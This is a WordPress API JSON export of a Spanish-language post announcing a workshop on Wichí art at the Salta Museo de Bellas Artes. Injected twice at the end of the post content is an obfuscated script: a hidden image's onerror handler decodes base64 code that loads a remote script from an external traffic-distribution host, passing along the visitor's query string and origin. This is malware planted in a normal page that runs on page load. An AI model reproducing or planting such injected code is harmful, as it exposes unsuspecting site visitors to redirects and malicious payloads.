{"id":3130,"date":"2023-09-25T21:03:34","date_gmt":"2023-09-26T00:03:34","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3130"},"modified":"2025-08-14T00:08:03","modified_gmt":"2025-08-14T03:08:03","slug":"museo-de-bellas-artes-encuentro-de-experimentacion-sensible-con-obras-de-arte-wichi","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3130","title":{"rendered":"Museo de Bellas Artes: Encuentro de experimentaci\u00f3n sensible con obras de arte wich\u00ed"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#8b0946\"><em>El mi\u00e9rcoles 27 de septiembre, de 10 a 12 h, se realizar\u00e1 en el Museo de Bellas Artes un \u201cEncuentro de experimentaci\u00f3n sensible\u201d con las obras de arte wich\u00ed de la muestra \u201cOTHEIWHE\u2019NEY \/ la visi\u00f3n\u201d.<\/em><\/h4>\n\n\n\n<p>El\u00a0encuentro\u00a0de experimentaci\u00f3n sensible con obras de arte wich\u00ed\u00a0 est\u00e1 destinado a integrantes de pueblos originarios, docentes, estudiantes y p\u00fablico en general, y tiene una duraci\u00f3n de 2 horas aproximadamente.<\/p>\n\n\n\n<p>La entrada es gratuita, con inscripci\u00f3n previa, hasta agotar el cupo. Para inscribirse, ingresar a\u00a0<a href=\"https:\/\/docs.google.com\/forms\/d\/e\/1FAIpQLSedlPU1ufBRN7sSLvCy3GvJKR2eTMCTrery8hqAMJiBQGQdiA\/viewform\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/docs.google.com\/forms\/d\/e\/1FAIpQLSedlPU1ufBRN7sSLvCy3GvJKR2eTMCTrery8hqAMJiBQGQdiA\/viewform<\/a><\/p>\n\n\n\n<p>A partir del recorrido por la muestra \u201cOTHEIWHE\u2019NEY \/ la visi\u00f3n\u201d, el encuentro propone sentir y reflexionar sobre cuestiones problem\u00e1ticas implicadas en la construcci\u00f3n de lugares de enunciaci\u00f3n ind\u00edgenas tales como: la figura de artista, el uso de las lenguas y las traducciones, la representaci\u00f3n de espiritualidades, pr\u00e1cticas, territorios y memorias como tr\u00e1nsitos afectivos, la pertinencia de categor\u00edas como arte o poes\u00eda y la presencia de los deseos en sus fuertes ligazones con la acci\u00f3n de estar vivo.<\/p>\n\n\n\n<p>En otra instancia, el encuentro propone generar un ambiente de pr\u00e1ctica y experimentaci\u00f3n con las palabras a nivel de la producci\u00f3n de textos con consignas sencillas y breves a fin de construir \u201cel mundo dicho por nosotros\u201d que toda enunciaci\u00f3n funda. En todos los casos, se trata de componer un pliego escrito en donde las voces hablen al mismo tiempo aunque sin decir lo mismo, en donde la escucha oriente las b\u00fasquedas hacia formas de hospitalidad y recreaci\u00f3n de los v\u00ednculos con los dem\u00e1s.<\/p>\n\n\n\n<p>Coordinan: Juan Manuel D\u00edaz Pas (ICSOH \u2013 CIUNSa) y Ver\u00f3nica Ardanaz (Fundaci\u00f3n Cebil)<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/museo-de-bellas-artes-encuentro-de-experimentacion-sensible-con-obras-de-arte-wichi-92008\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El mi\u00e9rcoles 27 de septiembre, de 10 a 12 h, se realizar\u00e1 en el Museo de Bellas Artes un \u201cEncuentro de experimentaci\u00f3n sensible\u201d con las obras de arte wich\u00ed de la muestra \u201cOTHEIWHE\u2019NEY \/ la visi\u00f3n\u201d. El\u00a0encuentro\u00a0de experimentaci\u00f3n sensible con obras de arte wich\u00ed\u00a0 est\u00e1 destinado a integrantes de pueblos originarios, docentes, estudiantes y p\u00fablico [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3131,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-3130","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3130"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3130"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3130\/revisions"}],"predecessor-version":[{"id":6958,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3130\/revisions\/6958"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3131"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3130"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3130"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3130"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}